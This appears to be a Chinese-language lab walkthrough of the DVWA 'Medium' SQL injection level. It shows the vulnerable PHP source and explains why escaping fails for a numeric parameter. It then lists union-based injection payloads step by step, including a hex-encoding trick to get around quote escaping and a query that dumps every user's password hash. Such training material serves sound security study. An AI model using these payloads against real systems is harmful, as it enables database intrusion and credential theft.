Medium Level
查看代碼
<?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Display values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } // This is used later on in the index.php page // Setting it here so we can close the database connection in here like in the rest of the source scripts $query = "SELECT COUNT(*) FROM users;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); $number_of_rows = mysqli_fetch_row( $result )[0]; mysqli_close($GLOBALS["___mysqli_ston"]); ?>
可以看到,Medium級別的代碼利用mysql_real_escape_string函數對如下特殊符號進行轉義,
- \x00
- \n
- \r
- \
- '
- "
- \x1a
同時前端頁面設置了下拉選擇表單,希望以此來控制用戶的輸入。
、
漏洞利用
雖然前端使用了下拉選擇菜單,但我們依然可以通過抓包構造請求,提交惡意構造的查詢參數。
下面我們使用HackBar進行演示。
1.判斷是否存在注入,注入是字符型還是數字型
輸入id為1′ or 1=1 #,報語法錯誤:
輸入id為1 or 1=1 #,查詢成功:
說明存在數字型注入。
(由於是數字型注入,服務器端的mysql_real_escape_string函數就形同虛設了,因為數字型注入並不需要借助引號。)
2.猜解SQL查詢語句中的字段數
輸入id為1 order by 2 #,查詢成功:
輸入id為1 order by 3 #,報錯:
說明執行的SQL查詢語句中只有兩個字段,即這里的First name、Surname。
3.確定顯示的字段順序
輸入id為1 union select 1,2 #,查詢成功:
說明執行的SQL語句為select First name,Surname from 表 where ID=id…
4.獲取當前數據庫
輸入id為1 union select 1,database() #,查詢成功:
說明當前的數據庫為dvwa。
5.獲取數據庫中的表
輸入id為1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查詢成功:
說明數據庫dvwa中一共有兩個表,guestbook與users。
6.獲取表中的字段名
輸入id為1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' #,查詢失敗:
這是因為單引號被轉義了,變成了\’。可以利用16進制進行繞過,
輸入id為1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 #,查詢成功:
說明users表中有8個字段,分別是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。
7.查詢數據
輸入id為1 union select 1,group_concat(user,0x3a,password) from users #,查詢成功:
這樣就得到了users表中所有用戶的user、password的數據。
參考:https://www.freebuf.com/articles/web/120747.html